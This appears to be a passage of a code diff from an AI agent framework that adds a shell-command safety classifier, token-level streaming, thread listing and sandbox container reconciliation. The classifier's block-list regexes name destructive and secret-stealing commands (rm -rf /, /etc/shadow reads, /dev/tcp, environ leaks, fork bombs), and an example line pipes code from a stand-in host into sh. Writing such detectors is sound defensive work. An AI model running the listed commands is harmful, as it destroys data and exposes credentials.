blob = json.dumps(normalized, sort_keys=True, default=str)
|
||||
return hashlib.md5(blob.encode()).hexdigest()[:12]
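A minimal demonstration of the order-independence property (standalone names, not the middleware's internals):

```
import hashlib
import json

def order_free_hash(keys: list[str]) -> str:
    # Sorting before serializing makes the hash a function of the multiset, not the order.
    blob = json.dumps(sorted(keys), sort_keys=True, default=str)
    return hashlib.md5(blob.encode()).hexdigest()[:12]

a = order_free_hash(["read_file:src/app.py:0-0", 'web_search:{"query": "x"}'])
b = order_free_hash(['web_search:{"query": "x"}', "read_file:src/app.py:0-0"])
assert a == b  # permutations of the same calls hash identically
```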
@@ -23,25 +23,119 @@ logger = logging.getLogger(__name__)
|
||||
|
||||
# Each pattern is compiled once at import time.
|
||||
_HIGH_RISK_PATTERNS: list[re.Pattern[str]] = [
|
||||
re.compile(r"rm\s+-[^\s]*r[^\s]*\s+(/\*?|~/?\*?|/home\b|/root\b)\s*$"), # rm -rf / /* ~ /home /root
|
||||
re.compile(r"(curl|wget).+\|\s*(ba)?sh"), # curl|sh, wget|sh
|
||||
# --- original rules (retained) ---
|
||||
re.compile(r"rm\s+-[^\s]*r[^\s]*\s+(/\*?|~/?\*?|/home\b|/root\b)\s*$"),
|
||||
re.compile(r"dd\s+if="),
|
||||
re.compile(r"mkfs"),
|
||||
re.compile(r"cat\s+/etc/shadow"),
|
||||
re.compile(r">\s*/etc/"), # overwrite /etc/ files
|
||||
re.compile(r">+\s*/etc/"),
|
||||
# --- pipe to sh/bash (generalised, replaces old curl|sh rule) ---
|
||||
re.compile(r"\|\s*(ba)?sh\b"),
|
||||
# --- command substitution (targeted – only dangerous executables) ---
|
||||
re.compile(r"[`$]\(?\s*(curl|wget|bash|sh|python|ruby|perl|base64)"),
|
||||
# --- base64 decode piped to execution ---
|
||||
re.compile(r"base64\s+.*-d.*\|"),
|
||||
# --- overwrite system binaries ---
|
||||
re.compile(r">+\s*(/usr/bin/|/bin/|/sbin/)"),
|
||||
# --- overwrite shell startup files ---
|
||||
re.compile(r">+\s*~/?\.(bashrc|profile|zshrc|bash_profile)"),
|
||||
# --- process environment leakage ---
|
||||
re.compile(r"/proc/[^/]+/environ"),
|
||||
# --- dynamic linker hijack (one-step escalation) ---
|
||||
re.compile(r"\b(LD_PRELOAD|LD_LIBRARY_PATH)\s*="),
|
||||
# --- bash built-in networking (bypasses tool allowlists) ---
|
||||
re.compile(r"/dev/tcp/"),
|
||||
# --- fork bomb ---
|
||||
re.compile(r"\S+\(\)\s*\{[^}]*\|\s*\S+\s*&"), # :(){ :|:& };:
|
||||
re.compile(r"while\s+true.*&\s*done"), # while true; do bash & done
|
||||
]
|
||||
|
||||
_MEDIUM_RISK_PATTERNS: list[re.Pattern[str]] = [
|
||||
re.compile(r"chmod\s+777"), # overly permissive, but reversible
|
||||
re.compile(r"pip\s+install"),
|
||||
re.compile(r"pip3\s+install"),
|
||||
re.compile(r"chmod\s+777"),
|
||||
re.compile(r"pip3?\s+install"),
|
||||
re.compile(r"apt(-get)?\s+install"),
|
||||
# sudo/su: no-op under Docker root; warn so LLM is aware
|
||||
re.compile(r"\b(sudo|su)\b"),
|
||||
# PATH modification: long attack chain, warn rather than block
|
||||
re.compile(r"\bPATH\s*="),
|
||||
]
|
||||
|
||||
|
||||
def _classify_command(command: str) -> str:
|
||||
"""Return 'block', 'warn', or 'pass'."""
|
||||
# Normalize for matching (collapse whitespace)
|
||||
def _split_compound_command(command: str) -> list[str]:
|
||||
"""Split a compound command into sub-commands (quote-aware).
|
||||
|
||||
Scans the raw command string so unquoted shell control operators are
|
||||
recognised even when they are not surrounded by whitespace
|
||||
(e.g. ``safe;rm -rf /`` or ``rm -rf /&&echo ok``). Operators inside
|
||||
quotes are ignored. If the command ends with an unclosed quote or a
|
||||
dangling escape, return the whole command unchanged (fail-closed —
|
||||
safer to classify the unsplit string than silently drop parts).
|
||||
"""
|
||||
parts: list[str] = []
|
||||
current: list[str] = []
|
||||
in_single_quote = False
|
||||
in_double_quote = False
|
||||
escaping = False
|
||||
index = 0
|
||||
|
||||
while index < len(command):
|
||||
char = command[index]
|
||||
|
||||
if escaping:
|
||||
current.append(char)
|
||||
escaping = False
|
||||
index += 1
|
||||
continue
|
||||
|
||||
if char == "\\" and not in_single_quote:
|
||||
current.append(char)
|
||||
escaping = True
|
||||
index += 1
|
||||
continue
|
||||
|
||||
if char == "'" and not in_double_quote:
|
||||
in_single_quote = not in_single_quote
|
||||
current.append(char)
|
||||
index += 1
|
||||
continue
|
||||
|
||||
if char == '"' and not in_single_quote:
|
||||
in_double_quote = not in_double_quote
|
||||
current.append(char)
|
||||
index += 1
|
||||
continue
|
||||
|
||||
if not in_single_quote and not in_double_quote:
|
||||
if command.startswith("&&", index) or command.startswith("||", index):
|
||||
part = "".join(current).strip()
|
||||
if part:
|
||||
parts.append(part)
|
||||
current = []
|
||||
index += 2
|
||||
continue
|
||||
if char == ";":
|
||||
part = "".join(current).strip()
|
||||
if part:
|
||||
parts.append(part)
|
||||
current = []
|
||||
index += 1
|
||||
continue
|
||||
|
||||
current.append(char)
|
||||
index += 1
|
||||
|
||||
# Unclosed quote or dangling escape → fail-closed, return whole command
|
||||
if in_single_quote or in_double_quote or escaping:
|
||||
return [command]
|
||||
|
||||
part = "".join(current).strip()
|
||||
if part:
|
||||
parts.append(part)
|
||||
return parts if parts else [command]
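Expected behavior on a few representative inputs (illustrative, not a test suite):

```
# Unquoted operators split even without surrounding whitespace; quoted ones do not;
# an unclosed quote fails closed and returns the whole command unsplit.
assert _split_compound_command("safe;rm -rf /") == ["safe", "rm -rf /"]
assert _split_compound_command("echo ok&&rm -rf /") == ["echo ok", "rm -rf /"]
assert _split_compound_command("echo 'a;b'") == ["echo 'a;b'"]
assert _split_compound_command("echo 'unterminated") == ["echo 'unterminated"]
```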
def _classify_single_command(command: str) -> str:
|
||||
"""Classify a single (non-compound) command. Return 'block', 'warn', or 'pass'."""
|
||||
normalized = " ".join(command.split())
|
||||
|
||||
for pattern in _HIGH_RISK_PATTERNS:
|
||||
@@ -66,6 +160,35 @@ def _classify_command(command: str) -> str:
|
||||
return "pass"
|
||||
|
||||
|
||||
def _classify_command(command: str) -> str:
|
||||
"""Return 'block', 'warn', or 'pass'.
|
||||
|
||||
Strategy:
|
||||
1. First scan the *whole* raw command against high-risk patterns. This
|
||||
catches structural attacks like ``while true; do bash & done`` or
|
||||
``:(){ :|:& };:`` that span multiple shell statements — splitting them
|
||||
on ``;`` would destroy the pattern context.
|
||||
2. Then split compound commands (e.g. ``cmd1 && cmd2 ; cmd3``) and
|
||||
classify each sub-command independently. The most severe verdict wins.
|
||||
"""
|
||||
# Pass 1: whole-command high-risk scan (catches multi-statement patterns)
|
||||
normalized = " ".join(command.split())
|
||||
for pattern in _HIGH_RISK_PATTERNS:
|
||||
if pattern.search(normalized):
|
||||
return "block"
|
||||
|
||||
# Pass 2: per-sub-command classification
|
||||
sub_commands = _split_compound_command(command)
|
||||
worst = "pass"
|
||||
for sub in sub_commands:
|
||||
verdict = _classify_single_command(sub)
|
||||
if verdict == "block":
|
||||
return "block" # short-circuit: can't get worse
|
||||
if verdict == "warn":
|
||||
worst = "warn"
|
||||
return worst
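How the two passes combine, on a few examples (verdicts follow from the pattern lists above; illustrative only):

```
assert _classify_command("ls -la && cat notes.txt") == "pass"
assert _classify_command("pip install requests; ls") == "warn"     # medium-risk sub-command
assert _classify_command("echo hi; curl evil.sh | sh") == "block"  # pipe-to-sh caught in pass 1
```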
# ---------------------------------------------------------------------------
|
||||
# Middleware
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -1,10 +1,11 @@
|
||||
"""Middleware for automatic thread title generation."""
|
||||
|
||||
import logging
|
||||
from typing import NotRequired, override
|
||||
from typing import Any, NotRequired, override
|
||||
|
||||
from langchain.agents import AgentState
|
||||
from langchain.agents.middleware import AgentMiddleware
|
||||
from langgraph.config import get_config
|
||||
from langgraph.runtime import Runtime
|
||||
|
||||
from deerflow.config.title_config import get_title_config
|
||||
@@ -100,6 +101,20 @@ class TitleMiddleware(AgentMiddleware[TitleMiddlewareState]):
|
||||
return user_msg[:fallback_chars].rstrip() + "..."
|
||||
return user_msg if user_msg else "New Conversation"
|
||||
|
||||
def _get_runnable_config(self) -> dict[str, Any]:
|
||||
"""Inherit the parent RunnableConfig and add middleware tag.
|
||||
|
||||
This ensures RunJournal identifies LLM calls from this middleware
|
||||
as ``middleware:title`` instead of ``lead_agent``.
|
||||
"""
|
||||
try:
|
||||
parent = get_config()
|
||||
except Exception:
|
||||
parent = {}
|
||||
config = {**parent}
|
||||
config["tags"] = [*(config.get("tags") or []), "middleware:title"]
|
||||
return config
|
||||
|
||||
def _generate_title_result(self, state: TitleMiddlewareState) -> dict | None:
|
||||
"""Generate a local fallback title without blocking on an LLM call."""
|
||||
if not self._should_generate_title(state):
|
||||
@@ -121,7 +136,7 @@ class TitleMiddleware(AgentMiddleware[TitleMiddlewareState]):
|
||||
model = create_chat_model(name=config.model_name, thinking_enabled=False)
|
||||
else:
|
||||
model = create_chat_model(thinking_enabled=False)
|
||||
response = await model.ainvoke(prompt)
|
||||
response = await model.ainvoke(prompt, config=self._get_runnable_config())
|
||||
title = self._parse_title(response.content)
|
||||
if title:
|
||||
return {"title": title}
|
||||
|
||||
@@ -25,7 +25,7 @@ import uuid
|
||||
from collections.abc import Generator, Sequence
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
from typing import Any, Literal
|
||||
|
||||
from langchain.agents import create_agent
|
||||
from langchain.agents.middleware import AgentMiddleware
|
||||
@@ -55,6 +55,9 @@ from deerflow.uploads.manager import (
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
StreamEventType = Literal["values", "messages-tuple", "custom", "end"]
|
||||
|
||||
|
||||
@dataclass
|
||||
class StreamEvent:
|
||||
"""A single event from the streaming agent response.
|
||||
@@ -69,7 +72,7 @@ class StreamEvent:
|
||||
data: Event payload. Contents vary by type.
|
||||
"""
|
||||
|
||||
type: str
|
||||
type: StreamEventType
|
||||
data: dict[str, Any] = field(default_factory=dict)
|
||||
|
||||
|
||||
@@ -254,13 +257,53 @@ class DeerFlowClient:
|
||||
|
||||
return get_available_tools(model_name=model_name, subagent_enabled=subagent_enabled)
|
||||
|
||||
@staticmethod
|
||||
def _serialize_tool_calls(tool_calls) -> list[dict]:
|
||||
"""Reshape LangChain tool_calls into the wire format used in events."""
|
||||
return [{"name": tc["name"], "args": tc["args"], "id": tc.get("id")} for tc in tool_calls]
|
||||
|
||||
@staticmethod
|
||||
def _ai_text_event(msg_id: str | None, text: str, usage: dict | None) -> "StreamEvent":
|
||||
"""Build a ``messages-tuple`` AI text event, attaching usage when present."""
|
||||
data: dict[str, Any] = {"type": "ai", "content": text, "id": msg_id}
|
||||
if usage:
|
||||
data["usage_metadata"] = usage
|
||||
return StreamEvent(type="messages-tuple", data=data)
|
||||
|
||||
@staticmethod
|
||||
def _ai_tool_calls_event(msg_id: str | None, tool_calls) -> "StreamEvent":
|
||||
"""Build a ``messages-tuple`` AI tool-calls event."""
|
||||
return StreamEvent(
|
||||
type="messages-tuple",
|
||||
data={
|
||||
"type": "ai",
|
||||
"content": "",
|
||||
"id": msg_id,
|
||||
"tool_calls": DeerFlowClient._serialize_tool_calls(tool_calls),
|
||||
},
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _tool_message_event(msg: ToolMessage) -> "StreamEvent":
|
||||
"""Build a ``messages-tuple`` tool-result event from a ToolMessage."""
|
||||
return StreamEvent(
|
||||
type="messages-tuple",
|
||||
data={
|
||||
"type": "tool",
|
||||
"content": DeerFlowClient._extract_text(msg.content),
|
||||
"name": msg.name,
|
||||
"tool_call_id": msg.tool_call_id,
|
||||
"id": msg.id,
|
||||
},
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _serialize_message(msg) -> dict:
|
||||
"""Serialize a LangChain message to a plain dict for values events."""
|
||||
if isinstance(msg, AIMessage):
|
||||
d: dict[str, Any] = {"type": "ai", "content": msg.content, "id": getattr(msg, "id", None)}
|
||||
if msg.tool_calls:
|
||||
d["tool_calls"] = [{"name": tc["name"], "args": tc["args"], "id": tc.get("id")} for tc in msg.tool_calls]
|
||||
d["tool_calls"] = DeerFlowClient._serialize_tool_calls(msg.tool_calls)
|
||||
if getattr(msg, "usage_metadata", None):
|
||||
d["usage_metadata"] = msg.usage_metadata
|
||||
return d
|
||||
@@ -315,6 +358,108 @@ class DeerFlowClient:
|
||||
return "\n".join(pieces) if pieces else ""
|
||||
return str(content)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Public API — threads
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def list_threads(self, limit: int = 10) -> dict:
|
||||
"""List the recent N threads.
|
||||
|
||||
Args:
|
||||
limit: Maximum number of threads to return. Default is 10.
|
||||
|
||||
Returns:
|
||||
Dict with "thread_list" key containing list of thread info dicts,
|
||||
sorted by thread creation time descending.
|
||||
"""
|
||||
checkpointer = self._checkpointer
|
||||
if checkpointer is None:
|
||||
from deerflow.agents.checkpointer.provider import get_checkpointer
|
||||
|
||||
checkpointer = get_checkpointer()
|
||||
|
||||
thread_info_map = {}
|
||||
|
||||
for cp in checkpointer.list(config=None, limit=limit):
|
||||
cfg = cp.config.get("configurable", {})
|
||||
thread_id = cfg.get("thread_id")
|
||||
if not thread_id:
|
||||
continue
|
||||
|
||||
ts = cp.checkpoint.get("ts")
|
||||
checkpoint_id = cfg.get("checkpoint_id")
|
||||
|
||||
if thread_id not in thread_info_map:
|
||||
channel_values = cp.checkpoint.get("channel_values", {})
|
||||
thread_info_map[thread_id] = {
|
||||
"thread_id": thread_id,
|
||||
"created_at": ts,
|
||||
"updated_at": ts,
|
||||
"latest_checkpoint_id": checkpoint_id,
|
||||
"title": channel_values.get("title"),
|
||||
}
|
||||
else:
|
||||
# Explicitly compare timestamps to ensure accuracy when iterating over unordered namespaces.
|
||||
# Treat None as "missing" and only compare when existing values are non-None.
|
||||
if ts is not None:
|
||||
current_created = thread_info_map[thread_id]["created_at"]
|
||||
if current_created is None or ts < current_created:
|
||||
thread_info_map[thread_id]["created_at"] = ts
|
||||
|
||||
current_updated = thread_info_map[thread_id]["updated_at"]
|
||||
if current_updated is None or ts > current_updated:
|
||||
thread_info_map[thread_id]["updated_at"] = ts
|
||||
thread_info_map[thread_id]["latest_checkpoint_id"] = checkpoint_id
|
||||
channel_values = cp.checkpoint.get("channel_values", {})
|
||||
thread_info_map[thread_id]["title"] = channel_values.get("title")
|
||||
|
||||
threads = list(thread_info_map.values())
|
||||
threads.sort(key=lambda x: x.get("created_at") or "", reverse=True)
|
||||
|
||||
return {"thread_list": threads[:limit]}
def get_thread(self, thread_id: str) -> dict:
|
||||
"""Get the complete thread record, including all node execution records.
|
||||
|
||||
Args:
|
||||
thread_id: Thread ID.
|
||||
|
||||
Returns:
|
||||
Dict containing the thread's full checkpoint history.
|
||||
"""
|
||||
checkpointer = self._checkpointer
|
||||
if checkpointer is None:
|
||||
from deerflow.agents.checkpointer.provider import get_checkpointer
|
||||
|
||||
checkpointer = get_checkpointer()
|
||||
|
||||
config = {"configurable": {"thread_id": thread_id}}
|
||||
checkpoints = []
|
||||
|
||||
for cp in checkpointer.list(config):
|
||||
channel_values = dict(cp.checkpoint.get("channel_values", {}))
|
||||
if "messages" in channel_values:
|
||||
channel_values["messages"] = [self._serialize_message(m) if hasattr(m, "content") else m for m in channel_values["messages"]]
|
||||
|
||||
cfg = cp.config.get("configurable", {})
|
||||
parent_cfg = cp.parent_config.get("configurable", {}) if cp.parent_config else {}
|
||||
|
||||
checkpoints.append(
|
||||
{
|
||||
"checkpoint_id": cfg.get("checkpoint_id"),
|
||||
"parent_checkpoint_id": parent_cfg.get("checkpoint_id"),
|
||||
"ts": cp.checkpoint.get("ts"),
|
||||
"metadata": cp.metadata,
|
||||
"values": channel_values,
|
||||
"pending_writes": [{"task_id": w[0], "channel": w[1], "value": w[2]} for w in getattr(cp, "pending_writes", [])],
|
||||
}
|
||||
)
|
||||
|
||||
# Sort globally by timestamp to prevent partial ordering issues caused by different namespaces (e.g., subgraphs)
|
||||
checkpoints.sort(key=lambda x: x["ts"] if x["ts"] else "")
|
||||
|
||||
return {"thread_id": thread_id, "checkpoints": checkpoints}
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Public API — conversation
|
||||
# ------------------------------------------------------------------
|
||||
@@ -336,6 +481,53 @@ class DeerFlowClient:
|
||||
consumers can switch between HTTP streaming and embedded mode
|
||||
without changing their event-handling logic.
|
||||
|
||||
Token-level streaming
|
||||
~~~~~~~~~~~~~~~~~~~~~
|
||||
This method subscribes to LangGraph's ``messages`` stream mode, so
|
||||
``messages-tuple`` events for AI text are emitted as **deltas** as
|
||||
the model generates tokens, not as one cumulative dump at node
|
||||
completion. Each delta carries a stable ``id`` — consumers that
|
||||
want the full text must accumulate ``content`` per ``id``.
|
||||
``chat()`` already does this for you.
|
||||
|
||||
Tool calls and tool results are still emitted once per logical
|
||||
message. ``values`` events continue to carry full state snapshots
|
||||
after each graph node finishes; AI text already delivered via the
|
||||
``messages`` stream is **not** re-synthesized from the snapshot to
|
||||
avoid duplicate deliveries.
|
||||
|
||||
Why not reuse Gateway's ``run_agent``?
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Gateway (``runtime/runs/worker.py``) has a complete streaming
|
||||
pipeline: ``run_agent`` → ``StreamBridge`` → ``sse_consumer``. It
|
||||
looks like this client duplicates that work, but the two paths
|
||||
serve different audiences and **cannot** share execution:
|
||||
|
||||
* ``run_agent`` is ``async def`` and uses ``agent.astream()``;
|
||||
this method is a sync generator using ``agent.stream()`` so
|
||||
callers can write ``for event in client.stream(...)`` without
|
||||
touching asyncio. Bridging the two would require spinning up
|
||||
an event loop + thread per call.
|
||||
* Gateway events are JSON-serialized by ``serialize()`` for SSE
|
||||
wire transmission. This client yields in-process stream event
|
||||
payloads directly as Python data structures (``StreamEvent``
|
||||
with ``data`` as a plain ``dict``), without the extra
|
||||
JSON/SSE serialization layer used for HTTP delivery.
|
||||
* ``StreamBridge`` is an asyncio-queue layer that decouples producers from
|
||||
consumers across an HTTP boundary (``Last-Event-ID`` replay,
|
||||
heartbeats, multi-subscriber fan-out). A single in-process
|
||||
caller with a direct iterator needs none of that.
|
||||
|
||||
So ``DeerFlowClient.stream()`` is a parallel, sync, in-process
|
||||
consumer of the same ``create_agent()`` factory — not a wrapper
|
||||
around Gateway. The two paths **should** stay in sync on which
|
||||
LangGraph stream modes they subscribe to; that invariant is
|
||||
enforced by ``tests/test_client.py::test_messages_mode_emits_token_deltas``
|
||||
rather than by a shared constant, because the three layers
|
||||
(Graph, Platform SDK, HTTP) each use their own naming
|
||||
(``messages`` vs ``messages-tuple``) and cannot literally share
|
||||
a string.
|
||||
|
||||
Args:
|
||||
message: User message text.
|
||||
thread_id: Thread ID for conversation context. Auto-generated if None.
|
||||
@@ -346,8 +538,8 @@ class DeerFlowClient:
|
||||
StreamEvent with one of:
|
||||
- type="values" data={"title": str|None, "messages": [...], "artifacts": [...]}
|
||||
- type="custom" data={...}
|
||||
- type="messages-tuple" data={"type": "ai", "content": str, "id": str}
|
||||
- type="messages-tuple" data={"type": "ai", "content": str, "id": str, "usage_metadata": {...}}
|
||||
- type="messages-tuple" data={"type": "ai", "content": <delta>, "id": str}
|
||||
- type="messages-tuple" data={"type": "ai", "content": <delta>, "id": str, "usage_metadata": {...}}
|
||||
- type="messages-tuple" data={"type": "ai", "content": "", "id": str, "tool_calls": [...]}
|
||||
- type="messages-tuple" data={"type": "tool", "content": str, "name": str, "tool_call_id": str, "id": str}
|
||||
- type="end" data={"usage": {"input_tokens": int, "output_tokens": int, "total_tokens": int}}
|
||||
@@ -364,13 +556,47 @@ class DeerFlowClient:
|
||||
context["agent_name"] = self._agent_name
|
||||
|
||||
seen_ids: set[str] = set()
|
||||
# Cross-mode handoff: ids already streamed via LangGraph ``messages``
|
||||
# mode so the ``values`` path skips re-synthesis of the same message.
|
||||
streamed_ids: set[str] = set()
|
||||
# The same message id carries identical cumulative ``usage_metadata``
|
||||
# in both the final ``messages`` chunk and the values snapshot —
|
||||
# count it only on whichever arrives first.
|
||||
counted_usage_ids: set[str] = set()
|
||||
cumulative_usage: dict[str, int] = {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0}
|
||||
|
||||
def _account_usage(msg_id: str | None, usage: Any) -> dict | None:
|
||||
"""Add *usage* to cumulative totals if this id has not been counted.
|
||||
|
||||
``usage`` is a ``langchain_core.messages.UsageMetadata`` TypedDict
|
||||
or ``None``; typed as ``Any`` because TypedDicts are not
|
||||
structurally assignable to plain ``dict`` under strict type
|
||||
checking. Returns the normalized usage dict (for attaching
|
||||
to an event) when we accepted it, otherwise ``None``.
|
||||
"""
|
||||
if not usage:
|
||||
return None
|
||||
if msg_id and msg_id in counted_usage_ids:
|
||||
return None
|
||||
if msg_id:
|
||||
counted_usage_ids.add(msg_id)
|
||||
input_tokens = usage.get("input_tokens", 0) or 0
|
||||
output_tokens = usage.get("output_tokens", 0) or 0
|
||||
total_tokens = usage.get("total_tokens", 0) or 0
|
||||
cumulative_usage["input_tokens"] += input_tokens
|
||||
cumulative_usage["output_tokens"] += output_tokens
|
||||
cumulative_usage["total_tokens"] += total_tokens
|
||||
return {
|
||||
"input_tokens": input_tokens,
|
||||
"output_tokens": output_tokens,
|
||||
"total_tokens": total_tokens,
|
||||
}
|
||||
|
||||
for item in self._agent.stream(
|
||||
state,
|
||||
config=config,
|
||||
context=context,
|
||||
stream_mode=["values", "custom"],
|
||||
stream_mode=["values", "messages", "custom"],
|
||||
):
|
||||
if isinstance(item, tuple) and len(item) == 2:
|
||||
mode, chunk = item
|
||||
@@ -382,6 +608,36 @@ class DeerFlowClient:
|
||||
yield StreamEvent(type="custom", data=chunk)
|
||||
continue
|
||||
|
||||
if mode == "messages":
|
||||
# LangGraph ``messages`` mode emits ``(message_chunk, metadata)``.
|
||||
if isinstance(chunk, tuple) and len(chunk) == 2:
|
||||
msg_chunk, _metadata = chunk
|
||||
else:
|
||||
msg_chunk = chunk
|
||||
|
||||
msg_id = getattr(msg_chunk, "id", None)
|
||||
|
||||
if isinstance(msg_chunk, AIMessage):
|
||||
text = self._extract_text(msg_chunk.content)
|
||||
counted_usage = _account_usage(msg_id, msg_chunk.usage_metadata)
|
||||
|
||||
if text:
|
||||
if msg_id:
|
||||
streamed_ids.add(msg_id)
|
||||
yield self._ai_text_event(msg_id, text, counted_usage)
|
||||
|
||||
if msg_chunk.tool_calls:
|
||||
if msg_id:
|
||||
streamed_ids.add(msg_id)
|
||||
yield self._ai_tool_calls_event(msg_id, msg_chunk.tool_calls)
|
||||
|
||||
elif isinstance(msg_chunk, ToolMessage):
|
||||
if msg_id:
|
||||
streamed_ids.add(msg_id)
|
||||
yield self._tool_message_event(msg_chunk)
|
||||
continue
|
||||
|
||||
# mode == "values"
|
||||
messages = chunk.get("messages", [])
|
||||
|
||||
for msg in messages:
|
||||
@@ -391,47 +647,25 @@ class DeerFlowClient:
|
||||
if msg_id:
|
||||
seen_ids.add(msg_id)
|
||||
|
||||
# Already streamed via ``messages`` mode; only (defensively)
|
||||
# capture usage here and skip re-synthesizing the event.
|
||||
if msg_id and msg_id in streamed_ids:
|
||||
if isinstance(msg, AIMessage):
|
||||
_account_usage(msg_id, getattr(msg, "usage_metadata", None))
|
||||
continue
|
||||
|
||||
if isinstance(msg, AIMessage):
|
||||
# Track token usage from AI messages
|
||||
usage = getattr(msg, "usage_metadata", None)
|
||||
if usage:
|
||||
cumulative_usage["input_tokens"] += usage.get("input_tokens", 0) or 0
|
||||
cumulative_usage["output_tokens"] += usage.get("output_tokens", 0) or 0
|
||||
cumulative_usage["total_tokens"] += usage.get("total_tokens", 0) or 0
|
||||
counted_usage = _account_usage(msg_id, msg.usage_metadata)
|
||||
|
||||
if msg.tool_calls:
|
||||
yield StreamEvent(
|
||||
type="messages-tuple",
|
||||
data={
|
||||
"type": "ai",
|
||||
"content": "",
|
||||
"id": msg_id,
|
||||
"tool_calls": [{"name": tc["name"], "args": tc["args"], "id": tc.get("id")} for tc in msg.tool_calls],
|
||||
},
|
||||
)
|
||||
yield self._ai_tool_calls_event(msg_id, msg.tool_calls)
|
||||
|
||||
text = self._extract_text(msg.content)
|
||||
if text:
|
||||
event_data: dict[str, Any] = {"type": "ai", "content": text, "id": msg_id}
|
||||
if usage:
|
||||
event_data["usage_metadata"] = {
|
||||
"input_tokens": usage.get("input_tokens", 0) or 0,
|
||||
"output_tokens": usage.get("output_tokens", 0) or 0,
|
||||
"total_tokens": usage.get("total_tokens", 0) or 0,
|
||||
}
|
||||
yield StreamEvent(type="messages-tuple", data=event_data)
|
||||
yield self._ai_text_event(msg_id, text, counted_usage)
|
||||
|
||||
elif isinstance(msg, ToolMessage):
|
||||
yield StreamEvent(
|
||||
type="messages-tuple",
|
||||
data={
|
||||
"type": "tool",
|
||||
"content": self._extract_text(msg.content),
|
||||
"name": getattr(msg, "name", None),
|
||||
"tool_call_id": getattr(msg, "tool_call_id", None),
|
||||
"id": msg_id,
|
||||
},
|
||||
)
|
||||
yield self._tool_message_event(msg)
|
||||
|
||||
# Emit a values event for each state snapshot
|
||||
yield StreamEvent(
|
||||
@@ -448,10 +682,12 @@ class DeerFlowClient:
|
||||
def chat(self, message: str, *, thread_id: str | None = None, **kwargs) -> str:
|
||||
"""Send a message and return the final text response.
|
||||
|
||||
Convenience wrapper around :meth:`stream` that returns only the
|
||||
**last** AI text from ``messages-tuple`` events. If the agent emits
|
||||
multiple text segments in one turn, intermediate segments are
|
||||
discarded. Use :meth:`stream` directly to capture all events.
|
||||
Convenience wrapper around :meth:`stream` that accumulates delta
|
||||
``messages-tuple`` events per ``id`` and returns the text of the
|
||||
**last** AI message to complete. Intermediate AI messages (e.g.
|
||||
planner drafts) are discarded — only the final id's accumulated
|
||||
text is returned. Use :meth:`stream` directly if you need every
|
||||
delta as it arrives.
|
||||
|
||||
Args:
|
||||
message: User message text.
|
||||
@@ -459,15 +695,21 @@ class DeerFlowClient:
|
||||
**kwargs: Override client defaults (same as stream()).
|
||||
|
||||
Returns:
|
||||
The last AI message text, or empty string if no response.
|
||||
The accumulated text of the last AI message, or empty string
|
||||
if no AI text was produced.
|
||||
"""
|
||||
last_text = ""
|
||||
# Per-id delta lists joined once at the end — avoids the O(n²) cost
|
||||
# of repeated ``str + str`` on a growing buffer for long responses.
|
||||
chunks: dict[str, list[str]] = {}
|
||||
last_id: str = ""
|
||||
for event in self.stream(message, thread_id=thread_id, **kwargs):
|
||||
if event.type == "messages-tuple" and event.data.get("type") == "ai":
|
||||
content = event.data.get("content", "")
|
||||
if content:
|
||||
last_text = content
|
||||
return last_text
|
||||
msg_id = event.data.get("id") or ""
|
||||
delta = event.data.get("content", "")
|
||||
if delta:
|
||||
chunks.setdefault(msg_id, []).append(delta)
|
||||
last_id = msg_id
|
||||
return "".join(chunks.get(last_id, ()))
# ------------------------------------------------------------------
|
||||
# Public API — configuration queries
|
||||
|
||||
@@ -112,6 +112,9 @@ class AioSandboxProvider(SandboxProvider):
|
||||
atexit.register(self.shutdown)
|
||||
self._register_signal_handlers()
|
||||
|
||||
# Reconcile orphaned containers from previous process lifecycles
|
||||
self._reconcile_orphans()
|
||||
|
||||
# Start idle checker if enabled
|
||||
if self._config.get("idle_timeout", DEFAULT_IDLE_TIMEOUT) > 0:
|
||||
self._start_idle_checker()
|
||||
@@ -175,6 +178,51 @@ class AioSandboxProvider(SandboxProvider):
|
||||
resolved[key] = str(value)
|
||||
return resolved
|
||||
|
||||
# ── Startup reconciliation ────────────────────────────────────────────
|
||||
|
||||
def _reconcile_orphans(self) -> None:
|
||||
"""Reconcile orphaned containers left by previous process lifecycles.
|
||||
|
||||
On startup, enumerate all running containers matching our prefix
|
||||
and adopt them all into the warm pool. The idle checker will reclaim
|
||||
containers that nobody re-acquires within ``idle_timeout``.
|
||||
|
||||
All containers are adopted unconditionally because we cannot
|
||||
distinguish "orphaned" from "actively used by another process"
|
||||
based on age alone — ``idle_timeout`` represents inactivity, not
|
||||
uptime. Adopting into the warm pool and letting the idle checker
|
||||
decide avoids destroying containers that a concurrent process may
|
||||
still be using.
|
||||
|
||||
This closes the fundamental gap where in-memory state loss (process
|
||||
restart, crash, SIGKILL) leaves Docker containers running forever.
|
||||
"""
|
||||
try:
|
||||
running = self._backend.list_running()
|
||||
except Exception as e:
|
||||
logger.warning(f"Failed to enumerate running containers during startup reconciliation: {e}")
|
||||
return
|
||||
|
||||
if not running:
|
||||
return
|
||||
|
||||
current_time = time.time()
|
||||
adopted = 0
|
||||
|
||||
for info in running:
|
||||
age = current_time - info.created_at if info.created_at > 0 else float("inf")
|
||||
# Single lock acquisition per container: atomic check-and-insert.
|
||||
# Avoids a TOCTOU window between the "already tracked?" check and
|
||||
# the warm-pool insert.
|
||||
with self._lock:
|
||||
if info.sandbox_id in self._sandboxes or info.sandbox_id in self._warm_pool:
|
||||
continue
|
||||
self._warm_pool[info.sandbox_id] = (info, current_time)
|
||||
adopted += 1
|
||||
logger.info(f"Adopted container {info.sandbox_id} into warm pool (age: {age:.0f}s)")
|
||||
|
||||
logger.info(f"Startup reconciliation complete: {adopted} adopted into warm pool, {len(running)} total found")
|
||||
|
||||
# ── Deterministic ID ─────────────────────────────────────────────────
|
||||
|
||||
@staticmethod
|
||||
@@ -316,13 +364,23 @@ class AioSandboxProvider(SandboxProvider):
|
||||
# ── Signal handling ──────────────────────────────────────────────────
|
||||
|
||||
def _register_signal_handlers(self) -> None:
|
||||
